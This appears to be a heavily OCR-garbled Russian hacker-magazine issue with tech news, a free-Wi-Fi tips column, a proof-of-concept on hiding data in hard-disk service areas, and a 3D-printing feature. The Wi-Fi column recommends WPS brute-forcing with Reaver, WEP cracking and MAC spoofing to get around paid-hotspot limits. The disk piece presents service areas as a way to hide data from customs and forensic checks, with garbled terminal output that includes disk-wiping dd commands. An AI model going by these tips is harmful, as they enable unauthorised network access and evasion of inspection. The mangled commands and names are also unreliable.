от 1300 долларов, но работающий по-прежнему на основе СІіготе 05 — гипер- 
трофированного браузера, непригодного для запуска сколь-нибудь мощных 
приложений или игр. 

Как отмечают авторы (Зіітобо и ТИе Ѵегде, получившие новинку на обзор, это один 
из самых совершенных ноутбуков на сегодняшний день. Дизайн новинки напоминает 

Арріе и некоторые корпоративные ноутбуки 
НР и ОеІІ — устройство выполнено в корпусе 
из анодированного алюминия. Сенсорный (!) 
дисплей диагональю 13" имеет разрешение 
2560 X 1700 пикселей (соотношение сторон 
3:2) и обеспечивает плотность пикселей 
239 РРІ. Для сравнения, раз уж мы вспом- 
нили Арріе, 13-дюймовый и 15-дюймовый 
МасВоок Рго с дисплеем Реііпа выдают 227 
и 220 РРІ соответственно. Базируется все 
это богатство на двухъядерном Іпіеі Соге і5 
(1,8 ГГц), графике Іп^еІ НО Огарііісз 4000 
и комплектуется ОЗУ в объеме 4 Гб (ООРЗ). 
Новинка выходит в двух версиях: с накопите- 
лем на 32 Гб и поддержкой только \Л/і-Рі и с на- 
копителем на 64 Пб, с поддержкой \Л/і-Рі с ІТЕ. 
Стоимость моделей составляет 1299 и 1449 
долларов соответственно. Покупателям 
устройства также предоставляется 1 Тб места 
в сервисе (Зоодіе Огіѵе бесплатно на три года, 
раз уж основной принцип СІіготе 08 — это 
«облачность». Стоит сказать, что без ноутбука терабайт пространства в Соодіе Огіѵе обой- 
дется в 1800 баксов за три года. Обзоры новинки почти в унисон заключают: «Это отличный 
ноутбук, который никто не купит». 

Внятно объяснить логику Ооодіе с этим продуктом не удалось еще никому. Отличное 
железо и по меньшей мере рискованная программная платформа. Конечно, с учетом того, 
что в США дела с СГЕ обстоят лучше, идея облачной системы не выглядит так утопично, 
как это было бы в России, но западные обозреватели тоже не прониклись идеей. «Кажется, 
Соодіе не заметила важную тенденцию для гаджетов последних лет. Не имеет значения на- 
чинка устройства, важно то, что оно умеет делать, важна экосистема», — пишут в Сігтосіо. 
Стартовал и проект Соодіе СІазз, обзаведшийся сайтом: ооооіе.сот/аіазз/зіагі - Согласно 
слухам, Соодіе определилась с ценой и датой выхода очков дополненной реальности — 
устройство, скорее всего, появится в продаже в конце текущего года и будет стоить менее 
1500 долларов. 



Взаимодействие 
с Соодіе Сіазз пре- 
имущественно 
осуществляется 
с помощью го- 
лосовых команд 
(хотя Брин гово- 
рил и о сенсорном 
управлении) 




СИготеЬоок РіхеІ — прекрасная игрушка для гиков. Помимо прочего, новинка оснащена кла- 
виатурой с подсветкой, стеклянным тачпадом, НО-веб-камерой и защищена стеклом СогіІІа 
Сіазз. Пока настораживает лишь ценник. 




ФАЙЛООБМЕННИКМЕОА 
ПЛАТИТЗА УЯЗВИМОСТИ 



Обещанная Кимом Доткомом программа поощре- 
ния за найденные дырки уже заработала. Обменник 
предлагает до 10 000 евро за баг (в зависимости 
от его сложности и потенциала). Имеются и первые 
результаты — только за первую неделю работы про- 
граммы было обнаружено семь уязвимостей. 




ЗА АВТОРОМ СРУРТОСАТ 
СЛЕДЯТСПЕЦСЛУЖБЫ 

Надим Кобейсси — автор Сгуріосаі сообщил 
в блоге, что за ним следят. Оказалось, Сгуріосаі вдруг 
попытался подключиться к Канадской службе развед- 
ки и безопасности. Кобейсси подозревает, что виной 
тому бекдор, но решил не поднимать панику, позже 
даже удалив пост. 




В МЕТРО НЕ БУДЕТ 
ХАЛЯВНОГОѴѴІ-РІ 



Ни один из сотовых операторов не захотел принять 
участия в аукционе за право развернуть в московском 
метро бесплатную сетьѴѴі-Рі, потратив на это не менее 
1 ,3 миллиарда рублей. В «Мегафоне» осторожно 
пояснили, что «условия аукциона не обеспечивают 
окупаемость проекта». 







о Уоиг сотри^ег І5 іпГес(есі! 

\Ѵіп<іо\ѵ$ Ьа5 <к!ес1е<і Т-Ѵіги5 ігѵГес!іоп! 



И І5 гесотепсЫ !о иге гресіаі ап<І2огиЬіе !оо1г Іо ргеѵеп! 
сЬие Ьгг. \Ѵшск>\ѵг «о11 поѵ/ сЬѵѵпІоакі виѵі ш$!«Л іЬе то$! 
ир-!о-сЫе вліІ 2 опЛ)іе\те Гог уои. 



КОМПЬЮТЕРОВ 
В МИРЕ ЗАРАЖЕНЫ 



— ^ Компания РапсIа^аЬ5 опублико- 
вала традиционный годовой отчет. 
Согласно документу, почти треть 
всех ПК мира инфицированы той 
или иной малварью. Хуже всего 
дела обстоят в Китае; там «болеет» 
54,89% машин. Зато самые «чи- 
стые» компы в Швеции, Швейцарии 
и Норвегии, там показатель зараже- 
ний всего 20-21%. 



(^есусіе Віп 






Неа<!ег 
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ПРО БЕСПЛАТНЫЙ 



Мне довольно часто приходится быть в разъездах, и поиск 
работающего ѴѴі-Рі часто превращается в занудный квест. 

С многочисленными хотспотами возникают бесконечные 
неполадки. Иной раз кажется, что нормальный инет — это 
слишком высокое требование к гостинице/кафе. Очень часто 
с этой проблемой ничего не сделаешь, однако есть несколько 
лайфхаков, которые могут быть полезными в охоте на Сеть. 



ѴѴІ-РІ 



к ОТКРЫТОМУ ХОТСПОТУ 
ПРОИСХОДИТ ПОДКЛЮЧЕНИЕ, 
но ИНЕТ НЕ РАБОТАЕТ. 

Очень часто в сети не работает ОНСР-сервер. 
Устройство не может получить ІР-адрес и другие 
сетевые параметры, поэтому ничего не работа- 
ет — достаточно посмотреть сетевые настройки, 
чтобы понять это. Соответственно, если прописать 
их вручную, то все часто начинает работать. Но где 
их взять? Можно перебрать самые распространен- 
ные варианты вроде ІР-адреса 192.168.0.x, маски 
255.255.255.0 и шлюза 192.168.0.1, но это не наш 
метод. Лучше всего запустить на ноуте сниффер 
Кізтеі (ѵ7\ѵѵу кі8іііеіѵ;іі :ме8ьліеі) и посмотреть па- 
раметры других клиентов, которые уже работают 
в этой сети. Кстати, ничто не мешает послушать 
эфир даже не с ноута (особенно сложно это делать 
с девайса на винде), а со смартфона. Уже давно су- 
ществуют версии 1п1егсер1ег-МС ( іп^егсеоіег.пегі. 
гу) для Ю8/АПСІГОІСІ. 

В СП ИСКЕ ТОЧЕК ДОСТУПА НАХОДИТ- 
СЯ СЕТЬ, ЯВНО ПРЕДНАЗНАЧЕННАЯ 
ДЛЯ ГОСТЕЙ (СЛОВА«РВЕЕ», «СОЕЗТ» 

В НАЗВАНИИ), ОДНАКО НИКТО НЕ МОЖЕТ 
ПОДСКАЗАТЬ КЛЮЧ. 

Не буду рассматривать вариант пробрутфорсить 
ѴѴРА/ѴѴРА2-КЛЮЧ — на ноутбуке с дискретной кар- 
той это сложно (не говоря о том, что весь процесс 
довольно геморный). Наделе по-прежнему попа- 
даются точки, защищенные ѴѴЕР, — в этом случае 
ключ подбирается за считаные минуты. Но если 
\Л/ЕР все же редкость, то чего по-прежнему 
в изобилии, так это роутеров с включенным ме- 
ханизмом ѴѴР5. В прошлом году мы подробно 
рассказывали о том, что он хорошо поддается 
брутфорсу. В этом случае при помощи утилиты 
Реаѵег ( с о сі е . ( ; о о а і е . с о пп / р ' а ѵ о і - ѵѵ ;з з) можно 



довольно быстро получить все необходимые дан- 
ные для подключения к сети. Рекомендую также 
прогу ѴѴРЗсгаскСи I ( з о и [ с еЛ о (:д ( ^ ._п г} і_; р \ 0 }сс 1 з. 

ѵѵрзсгаскоиі ) — СІЛ-надстройку для Реаѵег, в ко- 
торой имеется небольшая предопределенная 
база РІМ, соответствующих первым шести симво- 
лам МАС-адреса точки доступа (у производителя 
часто есть свой код по умолчанию, с которого луч- 
ше начать перебор). 

Более того, если у тебя есть физический до- 
ступ к роутеру, то можно воспользоваться \Л/Р8 
в штатном режиме (с помощью РІМ-кода, напи- 
санного на роутере или с помощью ѴѴР8-кнопки). 
Эта технология как раз и предназначена для того, 
чтобы упростить установку соединения :). 

ТОЧКА ДОСТУПА ОТКРЫТАЯ, НО ПОД- 
КЛЮЧЕНИЕ ОСУ ЩЕСТВЛ Я ЕТСЯ ЧЕРЕЗ 
ѴѴЕІСОМЕ-СТРАНИЦУ ПРИ ПОМОЩИ 
КЛЮЧА. ПРОБЛЕМА- КЛЮЧ РАБОТАЕТ 
ТОЛ ЬКО НА ОДНОМ УСТРОЙСТВЕ. 

Бывают ситуации, когда сессия жестко привя- 
зывается к МАС-адресу устройства. Это осо- 
бенно обломно, когда подключился к хотспоту 
с мобильного телефона, а потом нужно сделать 
что-то с ноута. Если дополнительный ключ найти 
не удается, то единственный способ — поменять 
на ноуте МАС-адрес (предварительно отклю- 
чив от сети смартфон, разумеется). Под виндой 



в этом поможет Тес^^пі1іит МАС Абсігезз СИапдег 
ѵ6 ( Іглас.^есІіпШигп.сот ). в Ыпих и 08 X это дела- 
ется прямо из консоли. 

ХОТСПОТ ПРЕДОСТАВЛЯЕТ БЕСПЛАТ- 
НЫЙ ИНЕТ, НОТОЛЬКО НА 1 5-30 МИНУТ. 

Существует целый ряд условно-бесплатных хот- 
спотов, когда некоторое время интернетом мож- 
но пользоваться бесплатно, но потом тебе будет 
предложено заплатить. Привязка, как правило, 
осуществляется по МАС, имени хоста и иногда 
к хедерам браузера. Соответственно, если с ними 
«поиграть», то легко можно представиться новым 
клиентом и получить дополнительный лимит. 

ХОТСПОТ ПРЕДЛАГАЕТУСТАНОВИТЬ 
КОРНЕВОЙ СЕРТИФИКАТ. 

Это не хак про получение инета, но важный нюанс 
при использовании открытых хотспотов. Очень 
тебе рекомендую поднять свой собственный 
ѴРМ (например, на базе бесплатного инстанса 
в Атагоп ЕС2) и пускать весь свой трафик в за- 
шифрованном виде. Более того, я уже несколько 
раз встречал предложение добавить корневой 
88Ьсертификат на смартфон. Думаю, ты пони- 
маешь, что означает такое действие пользовате- 
ля: владельцы хотспота в этом случае получают 
возможность слушать твой 881-трафик. Никогда 
на такие предложения не соглашайся, з: 
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Ргоо'і-о^-Сопсері 

ЗАПИСЬ ИНФОРМАЦИИ В СЕРВИСНЫЕ РАЗДЕЛЫ НОО 



ЧТО ЭТО ТАКОЕ 

Во всех жестких дисках есть так называе- 
мые сервисные разделы. Производитель 
записывает туда программы для обслу- 
живания диска: модули 5МАВТ, модули 
раннего обнаружения ошибок, модули са- 
модиагностики и так далее. Туда же ду- 
блируется информация с потенциально 
сбойных секторов на диске. Сервисные 
разделы не следует путать с другими скры- 
тыми областями диска, такими как ОСО 
(Оеѵісе сопЯдцгаІіоп оѵегіау) и НРА (Нозі 
Ргоіесіесі Агеа), поскольку те предназначе- 
ны для других целей. 

Информация в сервисных разделах 
находится вне адресного пространства 
ІВА и недоступна с помощью стандартных 
АТА-команд. Запись и чтение осущест- 
вляются специфичными для каждого про- 
изводителя командами и специальным 
программным обеспечением. В большин- 
стве случаев специфичные для вендора 
команды держатся в секрете, но зачастую 
производитель выпускает утилиты для ра- 
боты с сервисными разделами. Один 
из примеров — программа ѵѵбісІІеЗ.ехе 
( Ьі!.Іѵ/сі7Ѵа70 ) от компании ѴѴезІегп Оідііаі 
и ее опенсорсный аналог ісІІеЗ-ІооІз ( ЬіМѵ/ 
РЕзХИН ). Еще один пример — программа 
НООНаскг ( ЬіМѵ/ХОРРбс ) для модифика- 
ции записей в системных разделах НОО тех 
же самых \Л/ез^егп Оідііаі. 

На жестких дисках существуют и дру- 
гие резервные области, в которые можно 
записать информацию. Это флеш-память 
(обычно около одного мегабайта), неис- 
пользуемые секторы за пределами ЕВА, 
а также дорожки, доступ к которым теоре- 
тически можно получить с помощью неис- 
пользуемых головок, имеющихся в НОО. 

ЗАЧЕМ ЭТО НУЖНО 

Во-первых, иногда требуется просто 
скрыть информацию от беглого осмотра. 
Например, при въезде в США на таможне 
проверяют содержимое всех электронных 
носителей. Правоохранительные органы 
могут затеять такую проверку для сво- 
их нужд, но обычно она не идет дальше 
сканирования общедоступных секторов 
на диске. Никто не пытается проникнуть 
в сервисные разделы — криминалисты 
до сих пор не сообразили, что их можно 
приспособить для хранения информации. 

Во-вторых, запись информации в сер- 
висные разделы — это использование бо- 
нусного дискового пространства. Объем 
дискового пространства, которое выделя- 
ется под сервисные разделы, может быть 
разным. Например, в диске ѴѴ02500К8- 
ООМЗВО семейства Наѵѵк объемом 250 Гб 
(прошивка 02АЕС) в сервисные разделы 



записывается две копии файлов, по 6 Мб 
каждая. Под разделы выделяется пример- 
но 23 Мб (64 трека по 720 секторов на каж- 
дом) на каждой стороне пластины. В этой 
модели НОО шесть поверхностей пластин 
(головки с о по 5), но копия сервисных фай- 
лов записывается только на двух из них (го- 
ловки о и 1), а остальные четыре области 
резервируемого пространства остаются 
неиспользуемыми. Таким образом, общий 
объем резервируемого места составляет 
около 141 Мб, из них занято 12 Мб. 

Для сравнения: в модели ѴѴО10ЕАС8- 
0023В0 на 1 Тб с восемью поверхностями 
(головки с о по 7) общий объем резерви- 
руемого места составляет около 450 Мб, 
из них занято всего лишь 52 Мб, по 26 Мб 
на каждой из двух поверхностей (головки 
о и 1 ). То есть мы на «халяву» получаем поч- 
ти 400 Мб дискового пространства. Почему 
бы не использовать этот бонус? 

КАК ЭТО РАБОТАЕТ 

Информация в сервисных разделах важна 
для работы устройства, так что произво- 
дитель обычно записывает ее в несколь- 
ких копиях для сохранности. Повреждение 
этой информации ведет к потере рабо- 
тоспособности диска. Кстати, некоторые 
профессиональные программы для вос- 
становления НОО, такие как Асе ЕаЬогаІогу 
РСЗООО, способны вернуть неработающие 
диски к жизни, восстановив информацию 
в сервисных разделах. 

Запись информации в сервисные раз- 
делы возможна только с помощью спе- 
циального программного обеспечения, 
которое использует фирменные команды 
для доступа к этим разделам. 

Израильский специалист Ариэль Бер- 
кман (АгіеІ Вегктап) из компании Ресоѵег 
Іп^огтаііоп Тесііпоіодіез написал статью 
( ЬіМѵ/2ВОР2ѵ ) о работе с сервисными от- 
делами НОО, а также выложил РоС-код 
программы ( ЬіІ.Іѵ/иХоВсС І для записи 
94 Мб информации в сервисный отдел 
диска ѴѴезІегп Оіді!аІ 250СІВ Наѵѵк. На этом 
диске примерно 141 - 12 = 129 Мб свобод- 
ного дискового пространства в сервисных 
разделах. Чтобы гарантировать неприкос- 
новенность системной информации, РоС- 
программа записывает случайно сгенери- 
рованный набор данных (с рассчитанным 
М05-хещем для проверки надежности за- 
писи) только в те области, которые должны 
быть свободными на каждой поверхности: 
4 X 64 X 720 X 512 байт. 

Автор предупреждает, что его концеп- 
туальный код может привести к потере 
данных и порче НОО, так что использовать 
программу можно исключительно на свой 
страх и риск, з: 



ЗАПИСЬ ИНФОРМАЦИИ 
В СЕРВИСНЫЙ РАЗДЕЛ 



гоо-Ь@5Ііа-Рап1 ; 5А# сісі і-Р=/сІе у / и г а псіот соип^ 

184320 > гапс1от-61е ; тсІБзит гапсіот-^іе 
184320+0 гесогсіз іп 184320+0 гесогсіз ои1: 
94371840 Ьуіез (94МВ) соріесі^ 12.81875^ 7.4МВ/5 
0Ьаса7245е1е^'а160512а6217с13а7Ь0 гапсІот-61е 
гоо1:@5Иа-Рап1:~/5А# ./5А-соѵег-рос -р 0х0170_.^„._ 
-\А/ ./гапсІрт-61е 
изіп§ ррг-Ь асісігезз: 0x0170 

Мосіеі: ІлЮС Ш2500К5-00МЗВ0 

5/М: ІЛІО-ІЛІСАМК5391702 

Р/ІлІ Ѵег: 02.01С03 

ЕВА24: 268435455 ІВА48; 488397168 

Зегѵісе агеа 5ес;Еог5-рег-1;гаск С72^^^ 

Зегѵісе агеа Ігаскз (64) 

Мит о-Р ЬеасІ5(6) 

ипизес! геѵегзесі зрасе (94371840 Ьуііез) 
ѵѵгі1:іп§ ЬеасІ(2) 1;гаск(-1) 



іА/гі-ріп^ ИеасІ(5) 1:гаск(-64) 

гоо’Ь^ЗЬа-РапІ:/''# СІСІ і-Р=/сІеѵ/ 2 его о-Р=/сІеѵ/5сІЬ 

Ьз=1М 

сіа: мгі1:іп§ ’/аеѵ/заЬ’: Мо зрасе Іе-Рі: оп аеѵісе 
238476+0 гесогаз іп 238475+0 гесогаз ои1: 
250059350016 Ьу-Рез (250СВ) соріеа, 4732.863, 
52.8МВ/3 

гооі@5Иа-Рап1:~/5А# ./5А-соѵег-рос -р 0x0170 ^ 
-г а;Ріег-ааіп 2 -аеѵ- 2 его 

изіпё рогі ааагезз: 0x0170 

Моаеі : ІЛІ0С иЮ2500К5-00МЗВ0 

5/М; 1лЮ-кІСАМК5391702 

Р/ІАІ Ѵег: 02.01С03 

ІВА24 : 26843 5455 ІВА48 : 488397168 

5егѵісе агеа зесі:огз-рег-1:гаск (720) 

5егѵісе агеа Іігаскз (64) 

Мит о-Р Иеааз(б) 

Цпизеа геѵегзеа зрасе (94371840 ЬуРез) 
геааіпб Ііеаа(2) 1:гаск(-1) 



геааіпб Ьеаа(5) 1:гаск(-64) 

гооі@5Ьа'Рап1:~/5А# таЗзит а-Р 1 ;ег-ааіп 2 -аеѵ- 2 его ^ 
0Ьаса7245е1е-Ра160512а6217с13а7Ь0 ^ 
а-Рі;ег-ааіп§-аеѵ- 2 его 





НОВАЯ 

ЭПОХА 

ПІУ 



Планируя материал о 30-печати, мы столкнулись со 
своего рода дежавю. Представь себе, что потребова- 
лось бы, чтобы написать в 1992-1993 году специальный 
выпуск «Все о Ыпих», и помножь этот кошмар на страх 
подвигнуть читателя на пустую трату денег (линукс-то 
хотя бы бесплатный был), и ты поймешь проблему. Мы 
не можем сказать тебе сейчас: пойди и купи вот этот 
принтер. Слишком рано. Но мы расскажем тебе, поче- 
му это интересно и с чего можно начать уже сейчас. 
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Когда заходит речь о 30-принтерах, я вспоминаю любимый 
комикс ТгапзтеІгороІіШп. Его главный герой Иерусалим Спай- 
дер использовал машину, которая преобразовывала мусор в 
любые продукты, начиная от очков в стиле Ооодіе (ЗІазз и за- 
канчивая медикаментами. Не сомневаюсь, что, прочитав это, 
ты подумаешь «чувак, да это было еще у %имя твоего любимого 
фантаста%». Прости, я, наверно, не читал. Но смысл в том, что 
это происходит уже сейчас, на самом деле. 

Впрочем, все началось еще до трансметрополитана и тво- 
его любимого фантаста — считается, что первый 30-принтер 
был запущен в продажу еще в середине 80-х годов компанией 
30 8уз1егпз. Основатель компании и изобретатель технологии 
Чарльз Халл позиционировал свое детище как инструмент про- 
тотипирования. В качестве заготовки для печати использова- 
лась емкость с фотополимеризующимся веществом, которое 
кристаллизировалось в нужную форму под воздействием уль- 
трафиолетового излучения. С тех пор появлялось множество 
новых способов 30-печати, использовавших различные мате- 
риалы (пластик, металл, гипс или даже бумагу), менялись спо- 
собы нанесения вещества, конструкция устройства. Ключевых 
момента два — возможность использовать для производства 
чертеж, а не заготовленную форму (которую ведь тоже где-то 
нужно изготовить) и получение продукта путем накопления ма- 
териала, а не выточки его из болванки. 

Все это значительно упростило создание как прототипов, так 
и, в отдельных случаях, самих продуктов. Системы для трехмер- 
ной печати используются для изготовления эскизов, деталей и 
целых изделий в инженерных и архитекторских бюро. Тридцать 
лет технология совершенствовалась и находила применение в 
самых различных областях от стоматологии и хирургии до юве- 
лирного дела — но, увы, и стоимость таких машин измерялась 
в сотнях тысяч долларов. Поэтому Уоррена Эллиса и твоего 
любимого фантаста конкретно бесило одно жирное «но» — эта 
технология была абсолютно недоступна для домашнего приме- 
нения или хотя бы мелкосерийного производства. По большому 
счету, она остается непригодной для рядовых пользователей и 
сегодня, но произошло главное — в этом направлении начало 
многое делаться. 



«я могу придавать ма- 
терии 25 тысяч форм. 
И я не твоя долбаная 
пепельница» 




ШРО 

Создатели РгіпігЬоІ 
обещают, что сборка их 
набора займет до шести 
часов. Увы, пока прошло 
слишком мало времени, 
чтобы мы столкнулись 
с кем-нибудь, кто мог 
бы это подтвердить. 

Но с учетом того, что 
цена самой простой 
модели начинается с 400 
долларов за кит и с 500 
долларов за собранную 
модель, интерес явно 
будет. 



Основа основ 

ТЕХНОЛОГИЯ ПЕЧАТИ 

Основная технология, которая используется домашними принтерами, — это так назы- 
ваемая печать экструзивным методом (Рііатеп! Оерозібоп Ргіпбпд). Тонкий пруток из 
пластика послойно наносится экструдером-соплом в расплавленном виде согласно 
чертежу. Для этого пруток должен быть равномерной толщины и откалиброван под ха- 
рактеристики сопла, а также не содержать примесей и грязи в материале. Поэтому про- 
ще всего покупать расходники под конкретный принтер, поэтому же желательно брать 
более-менее распространенную модель. 



ИСХОДНЫЕ 

МАТЕРИАЛЫ 

Для печати прутком используется в основном два 
материала: 




АБС (акрилонитрилбутадиенстирол) 

Непрозрачный материал, застывает при температуре 
90-103 градуса по Цельсию. Продукт нефтепере- 
работки. Эластичный и ударопрочный — из него 
делаются, например, кубики Іедо. 

ПЛА (полилактид) 

Существует как в прозрачном, так и в непрозрач- 
ном виде. Это биоразлагаемый полимер (хотя, по 
отзывам бывалых, разложение происходит явно не 
так быстро, как принято считать), производят его из 
биологического сырья (кукуруза, сахарный тростник). 
Отличается более низкой температурой затвердева- 
ния (около 60 градусов по Цельсию). Также материал 
обеспечивает более высокое качество печати и 
меньшее количество артефактов. Однако сам по себе 
он более хрупкий, чем АБС-пластик. 

Тем не менее: периодически начинает встречаться 
и третий материал — ПВС (поливиниловый спирт) — 
растворимый в воде полимер. На данный момент это 
совсем редкий материал, плюс он дороже остальных. 
Однако растворимость делает ПВС интересным 
вариантом для создания подпорок модели — под- 
порки из других материалов приходится просто 
отламывать. С другой стороны, чтобы делать модель 
из одного материала, а подпорки — из другого, 
потребуется принтер с двумя соплами (да еще и под- 
держивающий печать ПВС), что также встречается не 
очень часто. Например, таким принтером является 
Реріісаіог 2Х. 



СОѴЕЯЗТОЙУ 






Текущий бум зО-принтеров начался с мо- 
дели Ргива Мепдеі 20\о года — модифика- 
ции более ранней (іоод год) Мепдеі автор- 
ства чешского инженера Иосифа Прусы 



НЕРНАРНЕРЯАРНЕРНАРПЕРНАР 

Предком большинства моделей, о которых пойдет речь дальше, 
стали принтеры семейства РерРар. В основе проекта, старто- 
вавшего в 2005 году, лежало две идеи: 

• чертежи принтеров доступны всем желающим; 

• любой РерРар может распечатать детали для другого такого 
же РерРар. 



МакегВоі РерІісаЩг 2: 
самый известный 
на сегодня принтер. 
2199 долларов на сайте 
производителя, 90-95 
тысяч рублей в России. 



За семь лет было разработано четыре поколения принте- 
ров. С каждой новой моделью разработчики становятся чуть 
ближе к своей конечной цели — сделать РерРар самовоспро- 
изводимым. Однако до сих пор это достигается лишь за счет 
упрощения конструкции. Для того чтобы на принтере можно 
было распечатать другой принтер, нужно научиться печатать 
электронику и металлические детали. Естественно, сделать 
это на устройстве, способном работать лишь с пластиком, 
невозможно. 

Несмотря на то что сборка РерРар не самый простой про- 
цесс и у проекта нет централизованного канала продажи 
(устройства распространяют члены сообщества и посредники), 
у проекта сформировалось большое международное сообще- 
ство. Однако самый заметный эффект РерРар ожидаемо за- 
ключается в появлении множества коммерческих принтеров на 
основе его спецификаций. Текущий бум 30-принтеров берет 
свой отсчет от модели Ргиза МепбеІ 2010 года — модификации 
более ранней (2009 год) МепбеІ авторства чешского инжене- 
ра Иосифа Прусы. К сожалению, как только дело РерРар было 
подхвачено другими, начались и большие проблемы для про- 
екта. Как писал раздосадованный Пруса в своем блоге, на ры- 
нок вышло очень большое количество компаний, выпускающих 
на основе его модификации собственные продукты. По его ело- 




ДОПОЛНИТЕЛЬНАЯ 

ИНФОРМАЦИЯ 

Самый подробный труд по современным 
30- принтерам и материалам для печати, который 
нам до сих пор попался, — это спецвыпуск журнала 
Маке. Это издание делается магазином товаров 
для энтузиастов, который торгует в том числе всеми 
30-принтерами, упоминаемыми в журнале. Несмотря 
на такую пристрастность, бесплатно доступный 
спецвыпуск служит отличной отправной точкой при 
выборе принтера ( ЬіМѵ/МкЗО ). 

Также множество полезной информации содержится 
на официальном сайте-вики ВеоПар.ого и в форуме 
сообщества: Тоттз.гергао.ога . 

Интересные обсуждения, как и следовало ожидать, 
проходят и в соответствующем сообществе в Вебсііі: 
\ллллл/.гес1сІі1.сот/г/ЗсІргіп1іпд . Также существуют кана- 
лы, посвященные конкретным семействам принте- 
ров, включая Веріісаіог, УШтакег и ВерПар. 



«А 




иР! РІиз: один из самых 
доступных принтеров, 
продающихся в готовом 
виде. 1500 долларов на 
сайте производителя, 
около 70 тысяч рублей 
в России. Доступна 
младшая модель ІІР! 
Міпі (900 долларов, 

40 тысяч рублей), об- 
ладающая меньшей 
областью печати. 



вам, эти компании начинали дистанцироваться от ВерВар, как 
только у них появлялись бюджеты на маркетинг, и потому любые 
их попытки ассоциироваться с движением открытого железа 
нужно считать полным буллшитом. 

Самый известный пример — компания МакегЬоІ Іпбизігіез, 
специализирующаяся на готовых 30-принтерах для домашних 
пользователей. Компания выпустила четыре поколения прин- 
теров, привлекла инвестиции на сумму в 10 миллионов долла- 
ров (например, от фонда основателя Атагоп Джеффа Безоса) 
и отказалась от открытой модели разработки. Чертежи чет- 
вертой модели МакегЬоІ (Веріісаіог 2) не были опубликованы, 
что вызвало заслуженную критику со стороны ВерВар и энту- 
зиастов. Вообще, если посмотреть на все это, то кажется, что 
опенсорсное комьюнити так ничему и не научилось за все эти 
годы. Мы ведь уже проходили вопли Ричарда Столлмана о том, 
что Ыпих необходимо именовать (ВМи/ипих, — это все разгово- 
ры примерно о том же. Это трагично, но, кажется, неизбежно. 
Тем не менее компании Бре Петиса (один из создателей и глава 
МакегЬоІ Іпбизігіез, в прошлом — активный член сообщества 
ВерВар) удалось заинтересовать в 30-печати широкие круги. 
Возможно, если бы не знали о Веріісаіог, большинство из нас 
не узнало бы и о ВерВар. В этом смысле история Ыпих тоже по- 
вторяется, как это ни банально. 

В итоге, консюмеризация 30-принтеров стала активно об- 
суждаемым трендом. Ее называют третьей промышленной ре- 
волюцией, и неслучайно. Ведь если вдуматься, то на чем стоит 
современное производство вот уже около двух сотен лет? На 
эффекте масштаба. Производить и продавать что-либо вы- 
годно тогда, когда ты выпускаешь для огромного рынка, это 
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РісазоЗОВиіІсІег: 
принтер делают 
в России, в Зелено- 
граде. Стоимость — 
80 тысяч рублей. 

На нем мы будем 
печатать логотип 
журнала в следую- 
щей статье. 



Ви\\с1ег 



КЛЮЧЕВОЙ ВОПРОС 

Американец Нирав Пател придумал еще один интересный проект для 30-печати. Изучив 
два самых распространенных в США дверных замка, он научился печатать дубликат ключа. 
Естественно, пластиковый ключ не будет долговечным, поэтому идея заключается в том, 
чтобы делать одноразовые ключи, например для гостей: ЬіІ.Іѵ/11:ітекеу 

А вот немецкому хакеру по кличке Рау (уж не знаю, имеется ли в виду имя или же слово 
«луч») пришло на ум менее безобидное занятие, результатами которого он, впрочем, по- 
делился с общественностью. «Лучик» научился печатать ключи от полицейских наручни- 
ков. Тут нужно понимать контекст: предполагается, что в одном участке все наручники 
будут открываться любым ключом. Это делается, чтобы открыть и закрыть наручники мог- 
ли разные офицеры. Единственная мера защиты — выдавать ограниченное число ключей, 
привязанных к конкретным людям. Однако, как продемонстрировал Рэй, создать дубликат 
возможно. Естественно, для этого нужно получить оригинал, но тем не менее — произво- 
дители больше не могут гарантировать, что ключ не окажется в чужих руках. 







го 



СОѴЕЯЗТОПУ 
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ДВЕ ЗО-КОТЛЕТЫ-ГРИЛЬ, 
СПЕЦИАЛЬНЫЙ СОУС-СЫР 

Как уже говорилось, 

30-печать — понятие 
очень широкое. Не- 
обязательно речь идет 
о печати из пластика. 

И необязательно ко- 
нечный продукт будет... 
невкусным. Стартап 
Мосіегп Меабоѵѵ 
надеется научиться 
печатать 30-мясо. 

Название компании 
довольно цинично — 

«Современный луг». 

Однако делается все 
это из благих намере- 
ний: мясо будет стоить дешевле в производстве и гуманнее в получении (ведь 
не придется никого убивать). Дело в том, что технологии печати органических 
тканей уже существуют, осталось научиться делать ткани, пригодные в пищу, 
а также найти способ снизить издержки — иначе котлета получится золотой. 
Стартап уже получил грант от Питера Тиля (знаменитого «ангельского» инвесто- 
ра РасеЬоок) на сумму от 250 до 350 тысяч долларов. 



ОСВОБОДИТЕ ІЕСО 

Как ты, может быть, уже знаешь, ^едо — не единственный кон- 
структор, и даже не первый. Первым был набор КібсІісгаЙ, вы- 
пущенный в 1932 году — за 15 лет до того, как Іедо вообще 
занялась пластиковыми игрушками. Помимо Іедо, существует 
множество малоизвестных серий конструкторов — все они 
несовместимы между собой. Даже у самого Іедо существу- 
ет минимум три главные линейки, кубики которых не всегда 
стыкуются между собой — это Оиріо (для самых маленьких), 
Тесііпіс (для самых старых) и все остальное (то, что понимает- 
ся под классическим Іедо). Но что, если у ребенка несколько 
наборов от разных компаний и он хочет сделать из них всех 
одну игрушку? 

Эту проблему для своего сына решил американец Голан 
Левин, инженер и профессор университета Карнеги. Левин 
создал чертежи, по которым можно распечатать 47 «пере- 
ходников» между различными наборами. Конечно, такие 
переходники сделают итоговую поделку менее изящной, но 
факт остается фактом — Левину удалось побороть пропри- 
етарность деталей в конструкторах. Все чертежи доступны на 
ТИіпдіѵегзе: ЫМѵ/ІеаоРгее . 

В России такие экзотичные наборы менее известны, поэто- 
му куда интереснее проекты, связанные с привычным и «ба- 
нальным» ^едо. Например, австралийскому художнику Грегу 
Петчковски пришла в голову гениальная мысль. Он замерил 
скол на каменной ступеньке на улице своего города и сделал 
модель, с помощью которой смог «заполнить» это простран- 
ство кубиками. Лучше просто посмотри на картинку. 




Хардкорные киты класса Рш5а Меп^еі 
потребуют от і6 до 24 часов на сборку 
(и речь будет идти о сверлении и паянии) 




ШРО 



Достаточно большой 
известности добился 
бельгийский стартап 
і.таіегіаіізе, предлагаю- 
щий услуги печати из 16 
материалов, вплоть до 
титана, стали, керамики, 
золота, серебра, бронзы 
и латуни. 



снижает стоимость каждой отдельной единицы. На пути к по- 
требителю встают преграды в виде стоимости производства 
и логистики. И вот тут-то и могут помочь 30-принтеры. Ненужно 
изготавливать и доставлять диковинку — просто разработай ее, 
подготовь цифровой макет, протестируй и продай файл с чер- 
тежом. Покупатель сможет получить готовый продукт быстрее, 
